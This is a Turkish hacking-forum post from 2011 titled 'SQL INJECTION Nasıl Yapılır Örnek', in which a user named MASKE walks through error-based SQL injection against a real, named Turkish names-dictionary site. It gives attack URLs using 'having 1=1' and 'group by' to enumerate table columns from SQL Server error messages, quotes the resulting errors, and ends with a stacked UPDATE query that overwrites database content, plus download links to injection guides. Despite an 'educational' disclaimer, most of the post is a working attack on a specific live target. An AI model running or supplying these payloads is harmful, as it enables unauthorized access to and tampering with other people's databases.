HACKER OO1
HOŞGELDİNİZ HACKEROO1
FORUM : BLOK : SİTEMİZ : =İÇRESİNDE
MÜKEMMEL PAYLAŞIMLAR VARDIR
SİZLERİNDE ARAMIZDA OLMANIZI İSTERİZ,TAMAMEN ÜCRETSİZ OLAN
PAYLAŞIMLAR VE ÜYELİGİMİZ:
KESİNLİKLE SİZLERİN İSTEKLERİNİZ
ÜZERİNE HAZIRLANMIŞ VE TASARLANMIŞTIR
SİTEMİZDE İYİ VAKİT GECİRMENİZ DİLEGİYLE
ADMİN

SQL INJECTION Nasıl Yapılır Örnek

Önceki başlık Sonraki başlık Aşağa gitmek

SQL INJECTION Nasıl Yapılır Örnek

Mesaj tarafından MASKE Bir Perş. Ocak 27, 2011 9:16 am

eğitim amaçlıdır başkası bu hatayı yaptı siz yapmayın diye yazılmıştır.
öncelikle sql injection yemesi muhtemel sayfalar asp php gibi kod kontrolunun ek işlemle yapılabildiği sayfalardır. genelde millet buna üşendiği için boyle açıklar bırakıyorlar. öncelikle bir sitede sql açığının olup olmadığını anlamak için boş alanlara tek tırnak girerek yada URL lerdeki id=212 gibi yerlere harf yada tek tırnak koyarak anlarız. bunun sonucunda hata alıyorsanız. o sitede boyle bir açık vardır. gelelim ornek uygulamamıza.


http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20having%201=1

adress bara kopyalıyoruz va url ye gidiyoruz. şu hatayı alıcaz.

URL deki 450 rakamı uydurmadır siz sağlam bi tane sozcuk id si bulun.
Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause./adsozlugu/ayrinti.asp, line 54


niye having 1=1 yazdık ona gelelim. having sozcuğu group by ile birlikte kullanılır. ve
having de tanımlı oğe yok ise
primary key olan alanı default alır. buda en azından tablo ismi ile primary key olan alanı hataya ekler.

http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20having%201=1
şimdi
having 1=1 den once group by adlar.id yi ekledik yine having de
tanımlı oğe yok şimdi bu seferde şu hatayı alıyoruz.

Hata Tipi:Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'adlar.adi' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause./adsozlugu/ayrinti.asp, line 54

bu sefer ne oldu having de tanımlı oğe yok group by da primary key var. bu sefer ikinci sutunu ekledi yine devam
ediyoruz bunuda ekliyoruz url ye ve boyle devam ediyoruz.

http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450%20group%20by%20adlar.id%20,adlar.adi,adlar.kokeni,adlar.anlami,adlar.adi2,adlar.cinsiyet%20having%201=1

sonunda hata vermeyene kadar devam ettik ve elimizde full tablo adları var artık.

artık sql kodlarımızı sokabiliriz. simdi

http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450

gidiyoruz ; (noktalı virgül) koyduk tan sonra sql cümlemizi yazıyoruz.

orenğin
http://www.tdk.org.tr/adsozlugu/ayrinti.asp?id=450; update adlar set adlar.anlami='deneme' where adlar.id=450

sql i salladım siz uygun olanını yaparsınız
Your file more_advanced_sql_injection.pdf (194985 Bytes) is now online.
Your Download-Link: http://rapidshare.de/files/2090836/m...ction.pdf.html

Your file WhitepaperSQLInjection.pdf (840681 Bytes) is now online.
Your Download-Link: http://rapidshare.de/files/2090944/W...ction.pdf.html
Kaynak: Wardom http://www.wardom.org/showthread.php?t=14031

Your file SQLInjection.pdf (77849 Bytes) is now online.
Your Download-Link: http://rapidshare.de/files/2090994/S...ction.pdf.html
avatar
MASKE
hacker
hacker

Mesaj Sayısı : 199
rep-puan : 2147486297
Rep Puan : 53
Kayıt tarihi : 17/07/10
Yaş : 36
Nerden : İZMİR

Oyun Sayfası
Oyun Alanı:

Kullanıcı profilini gör http://www.hackeroo1.ace.st

Sayfa başına dön Aşağa gitmek

Önceki başlık Sonraki başlık Sayfa başına dön

- Similar topics

 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz